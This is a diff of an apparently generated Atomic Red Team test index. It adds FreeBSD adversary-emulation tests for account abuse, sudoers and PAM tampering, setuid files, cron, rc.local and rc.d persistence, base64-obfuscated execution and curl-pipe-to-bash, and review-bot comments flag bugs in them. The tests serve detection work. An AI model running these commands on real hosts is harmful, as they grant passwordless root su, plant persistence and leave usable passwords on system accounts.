@@ -19080,6 +19863,26 @@ defense-evasion: nobody\nsu nobody\nwhoami\nexit\n" cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" + - name: Login as nobody (freebsd) + auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310 + description: 'An adversary may try to re-purpose a system account to appear + legitimate. In this test change the login shell of the nobody account, change + its password to nobody, su to nobody, exit, then reset nobody''s shell to + /usr/sbin/nologin. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged + user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho + $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" + cleanup_command: | + pw usermod nobody -s /usr/sbin/nologin + cat /etc/passwd |grep nobody + # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin T1211: technique: x_mitre_platforms: 
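Review bot: The cleanup of `Login as nobody (freebsd)` restores the login shell but never resets the password, so after the test the `nobody` account keeps a usable password; add a line that disables it again (`pw usermod nobody -h -` sets the field back to `*` if I read pw(8) correctly — verify). The description says the password is changed `to nobody`, but the executor pipes `openssl passwd -1 art` — a hash of `art` — into `pw mod user nobody -h 0`, and `-h 0` expects plaintext, so the hash string itself becomes the password; use `-H 0` for an encrypted value and align the description. The inline `# -> nobody:x:65534:...` comment in the executor is the Linux passwd layout, whereas the cleanup correctly shows FreeBSD's `nobody:*:65534:...`. The same points apply to the duplicate entry under privilege-escalation.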
@@ -20427,6 +21230,27 @@ privilege-escalation: name: sh elevation_required: true command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" + - name: Sudo usage (freebsd) + auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1 + description: 'Common Sudo enumeration methods. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n" - name: Unlimited sudo cache timeout auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc description: 'Sets sudo caching timestamp_timeout to a value for unlimited. 
@@ -20443,6 +21267,31 @@ privilege-escalation: command: | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers + - name: Unlimited sudo cache timeout (freebsd) + auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991 + description: 'Sets sudo caching timestamp_timeout to a value for unlimited. + This is dangerous to modify without using ''visudo'', do not do this on a + production system. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: | + sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers + sudo visudo -c -f /usr/local/etc/sudoers - name: Disable tty_tickets for sudo caching auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous 
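Review bot: `sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers` uses the GNU form of in-place editing; FreeBSD's sed requires a backup extension after `-i`, so here the `s/…/` script is taken as the extension and the sudoers path as the script, and the command errors out without editing anything. Use the BSD form `sudo sed -i '' 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers`, which is also what the `Malicious PAM rule (freebsd)` test later in this change already does with `sed -i ""`. The `sudo visudo -c -f` syntax check that follows would then actually validate the edited file.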
@@ -20458,6 +21307,30 @@ privilege-escalation: command: | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers + - name: Disable tty_tickets for sudo caching (freebsd) + auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a + description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous + to modify without using ''visudo'', do not do this on a production system. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: | + sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers" + sudo visudo -c -f /usr/local/etc/sudoers T1574.011: technique: modified: '2023-03-30T21:01:38.651Z' @@ -21218,9 +22091,8 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute 
@@ -21271,6 +22143,33 @@ privilege-escalation: rm /etc/cron.hourly/#{cron_script_name} rm /etc/cron.monthly/#{cron_script_name} rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /etc/cron.d folder + auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846' + description: 'This test adds a script to /etc/cron.d folder configured to execute + on a schedule. + + ' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo '*/5 * * * * root echo "Hello + from Atomic Red Team"' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: sh + command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name} + + ' + cleanup_command: 'rm /etc/cron.d/#{cron_script_name} + + ' - name: Cron - Add script to /var/spool/cron/crontabs/ folder auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 description: 'This test adds a script to a /var/spool/cron/crontabs folder configured @@ -23220,6 +24119,32 @@ privilege-escalation: command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'' + ' + cleanup_command: 'rm -f /tmp/art-fish.txt + + ' + name: sh + - name: Trap EXIT (freebsd) + auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f + description: | + Launch bash shell with command arg to create TRAP on EXIT. + The trap executes script that writes to /tmp/art-fish.txt + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if bash is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y bash)\n" + executor: + command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" + EXIT'' + ' cleanup_command: 'rm -f /tmp/art-fish.txt 
@@ -23237,6 +24162,32 @@ privilege-escalation: command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'' + ' + cleanup_command: 'rm -f /tmp/art-fish.txt + + ' + name: sh + - name: Trap SIGINT (freebsd) + auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada + description: | + Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. + The trap executes script that writes to /tmp/art-fish.txt + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if bash is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y bash)\n" + executor: + command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" + SIGINT && kill -SIGINT $$'' + ' cleanup_command: 'rm -f /tmp/art-fish.txt @@ -23904,6 +24855,32 @@ privilege-escalation: sudo rm /tmp/hello.c name: sh elevation_required: true + - name: Make and modify binary from C source (freebsd) + auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c + description: 'Make, change owner, and change file attributes on a C source code + file + + ' + supported_platforms: + - linux + input_arguments: + payload: + description: hello.c payload + type: path + default: PathToAtomicsFolder/T1548.001/src/hello.c + executor: + command: | + cp #{payload} /tmp/hello.c + chown root /tmp/hello.c + make /tmp/hello + chown root /tmp/hello + chmod u+s /tmp/hello + /tmp/hello + cleanup_command: | + rm /tmp/hello + rm /tmp/hello.c + name: sh + elevation_required: true - name: Set a SetUID flag on file auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in FreeBSD. 
@@ -23927,6 +24904,28 @@ privilege-escalation: ' name: sh elevation_required: true + - name: Set a SetUID flag on file (freebsd) + auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283 + description: 'This test sets the SetUID flag on a file in FreeBSD. + + ' + supported_platforms: + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetUID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + touch #{file_to_setuid} + chown root #{file_to_setuid} + chmod u+xs #{file_to_setuid} + cleanup_command: 'rm #{file_to_setuid} + + ' + name: sh + elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. @@ -23950,6 +24949,28 @@ privilege-escalation: ' name: sh elevation_required: true + - name: Set a SetGID flag on file (freebsd) + auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d + description: 'This test sets the SetGID flag on a file in FreeBSD. + + ' + supported_platforms: + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetGID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + touch #{file_to_setuid} + chown root #{file_to_setuid} + chmod g+xs #{file_to_setuid} + cleanup_command: 'rm #{file_to_setuid} + + ' + name: sh + elevation_required: true - name: Make and modify capabilities of a binary auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072 description: | @@ -24003,7 +25024,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -4000 @@ -24017,7 +25037,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -2000 
@@ -26940,6 +27959,26 @@ privilege-escalation: head -n '-2' ~/.bashrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bashrc name: sh + - name: Add command to .shrc + auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53 + description: 'Adds a command to the .shrc file of the current user + + ' + supported_platforms: + - linux + input_arguments: + command_to_add: + description: Command to add to the .shrc file + type: string + default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004 + executor: + command: 'echo ''#{command_to_add}'' >> ~/.shrc + + ' + cleanup_command: | + head -n '-2' ~/.shrc > /tmp/T1546.004 + mv /tmp/T1546.004 ~/.shrc + name: sh - name: Append to the system shell profile auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b description: 'An adversary may wish to establish persistence by executing malicious @@ -26947,7 +27986,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -26970,7 +28008,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: 
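Review bot: The cleanup for `Add command to .shrc` relies on `head -n '-2' ~/.shrc`, a negative line count that is a GNU extension; FreeBSD's head rejects it (`illegal line count`), and because the redirection has already created an empty `/tmp/T1546.004`, the following `mv` then replaces the user's `~/.shrc` with an empty file — a destructive cleanup failure if I am right about BSD head. Since the executor appends exactly one line, `sed -i '' '$d' ~/.shrc` removes what the test added and is BSD-safe. The remaining hunks on this line only drop `- linux:freebsd` lines.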
@@ -28466,6 +29503,27 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi + ' + - name: rc.local (FreeBSD) + auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476 + description: 'Modify rc.local + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local + echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + ' T1134: technique: 
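Review bot: `rc.local (FreeBSD)` writes a `#\!/usr/local/bin/bash` header and a `python3.9 -c` line into `/etc/rc.local` but declares no dependency on the bash or python packages, unlike the trap tests in this change which add a `pkg install -y bash` prereq; on a stock FreeBSD host neither interpreter exists, so the modified rc.local fails at next boot instead of writing its marker. Inside single quotes the backslash in `'#\!/usr/local/bin/bash'` is literal, so the first line written is not a valid shebang. The description `Modify rc.local` is too thin to tell a reader what happens; I would state that rc.local is backed up to `/etc/rc.local.original`, replaced with a script whose base64 payload runs `os.popen` to write `/tmp/T1037.004.rc.local` on boot, and restored by the cleanup.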
@@ -28741,6 +29799,45 @@ privilege-escalation: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + - name: Create SysV Service + auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6 + description: 'This test creates a SysV service unit file and enables it as a + service. + + ' + supported_platforms: + - linux + input_arguments: + rc_service_path: + description: Path to rc service file + type: path + default: "/usr/local/etc/rc.d" + rc_service_file: + description: File name of rc service file + type: string + default: art-test + executor: + command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho + ' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho + '# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '# + REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD: + shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho + '. 
/etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho + 'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable' + >> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}' + >> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"' + >> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"' + >> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho + 'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{' + >> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker' + >> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho + ' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command + \"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice + art-test enable\nservice art-test start\n" + cleanup_command: | + sysrc -x art_test_enable + rm -f #{rc_service_path}/#{rc_service_file} + name: sh - name: Create Systemd Service file, Enable the service , Modify and Reload the service. auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 
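Review bot: The name and description of `Create SysV Service` do not match what it does: the executor writes a FreeBSD rc.d script (`PROVIDE`/`REQUIRE` keywords, `load_rc_config`, `run_rc_command`) under `/usr/local/etc/rc.d`, which is neither SysV nor a `unit file`; rename it along the lines of `Create FreeBSD rc.d Service` and describe it as an rc.d script enabled with `service art-test enable`. The cleanup removes the script and the `sysrc` variable but leaves `/tmp/art-test.marker` created by `art_test_start`; add `rm -f /tmp/art-test.marker`. The header is echoed from `'#\!/bin/sh'`, where the backslash is literal, so the script appears to start with `#\!/bin/sh` rather than a valid shebang — confirm on a FreeBSD host. This hunk starts on the previous line.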
@@ -29711,6 +30808,39 @@ privilege-escalation: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec}' + - name: At - Schedule a job freebsd + auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b + description: 'This test submits a command to be run in the future by the `at` + daemon. + + ' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: string + default: now + 1 minute + at_command: + description: The command to be run + type: string + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` executable must exist in the PATH + + ' + prereq_command: 'which at + + ' + get_prereq_command: 'echo ''Please install `at` ; they were not found in the + PATH (Package name: `at`)'' + + ' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec}' T1055.001: technique: modified: '2022-10-18T21:07:23.748Z' @@ -30036,6 +31166,23 @@ privilege-escalation: whoami exit cleanup_command: "userdel -r art \n" + - name: Create local account (FreeBSD) + auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 + description: 'An adversary may wish to create an account with admin privileges + to work with. In this test we create a "art" user with the password art, switch + to art, execute whoami, exit and delete the art user. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) + | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" + cleanup_command: 'rmuser -y art + + ' - name: Reactivate a locked/expired account (Linux) auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931 description: "A system administrator may have locked and expired a user account 
@@ -30059,6 +31206,30 @@ privilege-escalation: whoami exit cleanup_command: "userdel -r art \n" + - name: Reactivate a locked/expired account (FreeBSD) + auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf' + description: "A system administrator may have locked and expired a user account + rather than deleting it. \"the user is coming back, at some stage\" An adversary + may reactivate a inactive account in an attempt to appear legitimate. \n\nIn + this test we create a \"art\" user with the password art, lock and expire + the account, try to su to art and fail, unlock and renew the account, su successfully, + then delete the account.\n" + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/sh + echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 + pw lock art + pw usermod art -e +1d + pw unlock art + pw user mod art -e +99d + su art + whoami + exit + cleanup_command: "rmuser -y art \n" - name: Login as nobody (Linux) auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85 description: 'An adversary may try to re-purpose a system account to appear 
@@ -30077,6 +31248,26 @@ privilege-escalation: nobody\nsu nobody\nwhoami\nexit\n" cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" + - name: Login as nobody (freebsd) + auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310 + description: 'An adversary may try to re-purpose a system account to appear + legitimate. In this test change the login shell of the nobody account, change + its password to nobody, su to nobody, exit, then reset nobody''s shell to + /usr/sbin/nologin. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged + user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho + $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" + cleanup_command: | + pw usermod nobody -s /usr/sbin/nologin + cat /etc/passwd |grep nobody + # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin T1574.012: technique: x_mitre_platforms: @@ -30849,9 +32040,8 @@ execution: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute 
@@ -30902,6 +32092,33 @@ execution: rm /etc/cron.hourly/#{cron_script_name} rm /etc/cron.monthly/#{cron_script_name} rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /etc/cron.d folder + auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846' + description: 'This test adds a script to /etc/cron.d folder configured to execute + on a schedule. + + ' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo '*/5 * * * * root echo "Hello + from Atomic Red Team"' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: sh + command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name} + + ' + cleanup_command: 'rm /etc/cron.d/#{cron_script_name} + + ' - name: Cron - Add script to /var/spool/cron/crontabs/ folder auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 description: 'This test adds a script to a /var/spool/cron/crontabs folder configured @@ -33103,7 +34320,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -33128,7 +34344,6 @@ execution: Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -33222,7 +34437,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -33242,7 +34456,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -33260,7 +34473,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -33275,7 +34487,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh 
@@ -33299,6 +34510,25 @@ execution: elevation_required: false command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |base64 -d |/bin/bash\nunset ART \n" + - name: Obfuscated command line scripts (freebsd) + auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062 + description: 'An adversary may pre-compute the base64 representations of the + terminal commands that they wish to execute in an attempt to avoid or frustrate + detection. The following commands base64 encodes the text string id, then + base64 decodes the string, then pipes it as a command to bash, which results + in the id command being executed. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: | + ART=$(echo -n "id" |b64encode -r -) + echo "\$ART=$ART" + echo -n "$ART" |b64decode -r |/bin/sh + unset ART - name: Change login shell auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 description: "An adversary may want to use a different login shell. The chsh 
@@ -33329,6 +34559,37 @@ execution: cat /etc/passwd |grep ^art cleanup_command: 'userdel art + ' + - name: Change login shell (freebsd) + auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c + description: "An adversary may want to use a different login shell. The chsh + command changes the user login shell. The following test, creates an art user + with a /bin/sh shell, changes the users shell to sh, then deletes the art + user. \n" + supported_platforms: + - linux + dependencies: + - description: 'chsh - change login shell, must be installed + + ' + prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit + 1"; exit 1; fi + + ' + get_prereq_command: 'echo "Automated installer not implemented yet, please + install chsh manually" + + ' + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/csh + cat /etc/passwd |grep ^art + chsh -s /bin/sh art + cat /etc/passwd |grep ^art + cleanup_command: 'rmuser -y art + ' - name: Environment variable scripts auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51 @@ -33348,6 +34609,25 @@ execution: echo $ART |/bin/bash cleanup_command: 'unset ART + ' + - name: Environment variable scripts (freebsd) + auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee + description: 'An adversary may place scripts in an environment variable because + they can''t or don''t wish to create script files on the host. The following + test, in a bash shell, exports the ART variable containing an echo command, + then pipes the variable to /bin/sh + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: | + export ART='echo "Atomic Red Team was here... T1059.004"' + echo $ART |/bin/sh + cleanup_command: 'unset ART + ' - name: Detecting pipe-to-shell auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1 
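Review bot: The description of `Change login shell (freebsd)` says the art user is created `with a /bin/sh shell` and then changed `to sh`, but the executor runs `pw useradd art -g wheel -s /bin/csh` followed by `chsh -s /bin/sh art`; it should read `creates an art user with a /bin/csh shell, changes the user's shell to /bin/sh`. In the same hunk, `Environment variable scripts (freebsd)` says the test runs `in a bash shell` while its executor is `sh` and pipes to `/bin/sh`. The chsh `prereq_command` only echoes the strings `exit 0`/`exit 1` and relies on the trailing `exit 1` for its status; dropping the echoes would make the intent clearer.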
@@ -33387,6 +34667,42 @@ execution: cleanup_command: 'rm /tmp/art.txt ' + - name: Detecting pipe-to-shell (freebsd) + auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632 + description: 'An adversary may develop a useful utility or subvert the CI/CD + pipe line of a legitimate utility developer, who requires or suggests installing + their utility by piping a curl download directly into bash. Of-course this + is a very bad idea. The adversary may also take advantage of this BLIND install + method and selectively running extra commands in the install script for those + who DO pipe to bash and not for those who DO NOT. This test uses curl to download + the pipe-to-shell.sh script, the first time without piping it to bash and + the second piping it into bash which executes the echo command. + + ' + supported_platforms: + - linux + input_arguments: + remote_url: + description: url of remote payload + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh + dependency_executor_name: sh + dependencies: + - description: 'Check if running on a Debian based machine. + + ' + prereq_command: | + if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + get_prereq_command: 'pkg update && pkg install -y curl + + ' + executor: + name: sh + elevation_required: false + command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url} + |bash\nls -la /tmp/art.txt \n" + cleanup_command: "rm /tmp/art.txt \n" - name: Current kernel information enumeration auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14 description: 'An adversary may want to enumerate the kernel information to tailor 
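Review bot: The dependency description for `Detecting pipe-to-shell (freebsd)` reads `Check if running on a Debian based machine.` while the `prereq_command` greps for `FreeBSD` in `/etc/os-release`; change it to `Check if running on FreeBSD and curl is installed.`. The executor also pipes the second download into `bash` although the test is written for `sh` and, unlike the trap tests in this change, declares no bash dependency; on a FreeBSD host without the bash package the pipe fails, `/tmp/art.txt` is never written, and `cleanup_command: rm /tmp/art.txt` errors as well. Either pipe into `/bin/sh` or add the same bash prereq the other FreeBSD tests use.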
@@ -33830,7 +35146,6 @@ execution: description: Download and execute shell script and write to file then execute locally using Python -c (command mode) supported_platforms: - - linux:freebsd - linux input_arguments: script_url: @@ -33872,7 +35187,6 @@ execution: description: Create Python file (.py) that downloads and executes shell script via executor arguments supported_platforms: - - linux:freebsd - linux input_arguments: python_script_name: @@ -33930,7 +35244,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux input_arguments: python_script_name: @@ -33995,7 +35308,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux dependencies: - description: 'Verify if python is in the environment variable path and attempt @@ -34845,6 +36157,39 @@ execution: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec}' + - name: At - Schedule a job freebsd + auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b + description: 'This test submits a command to be run in the future by the `at` + daemon. + + ' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: string + default: now + 1 minute + at_command: + description: The command to be run + type: string + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` executable must exist in the PATH + + ' + prereq_command: 'which at + + ' + get_prereq_command: 'echo ''Please install `at` ; they were not found in the + PATH (Package name: `at`)'' + + ' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec}' T1035: technique: x_mitre_platforms: 
@@ -35613,6 +36958,36 @@ persistence: ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} + ' + - name: Malicious PAM rule (freebsd) + auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3 + description: | + Inserts a rule into a PAM config and then tests it. + + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. + supported_platforms: + - linux + input_arguments: + path_to_pam_conf: + description: PAM config file to modify. + type: string + default: "/etc/pam.d/su" + pam_rule: + description: Rule to add to the PAM config. + type: string + default: auth sufficient pam_succeed_if.so uid >= 0 + index: + description: Index where the rule is inserted. + type: integer + default: 8 + executor: + name: sh + elevation_required: true + command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} + + ' + cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf} + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 @@ -37154,9 +38529,8 @@ persistence: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute 
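Review bot: `pam_succeed_if.so` in the default `pam_rule` of `Malicious PAM rule (freebsd)` is a Linux-PAM module; FreeBSD's OpenPAM does not ship it as far as I know, so the line inserted into `/etc/pam.d/su` would reference a module that cannot be loaded rather than exercise the technique, and until the cleanup runs `su` may fail for every user on the host — confirm on a FreeBSD system before merging. The `sed -i ""` form used here is the correct BSD invocation and is the pattern the sudo tests earlier in this change should follow. Since the index is generated, correct the default in the source atomic YAML.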
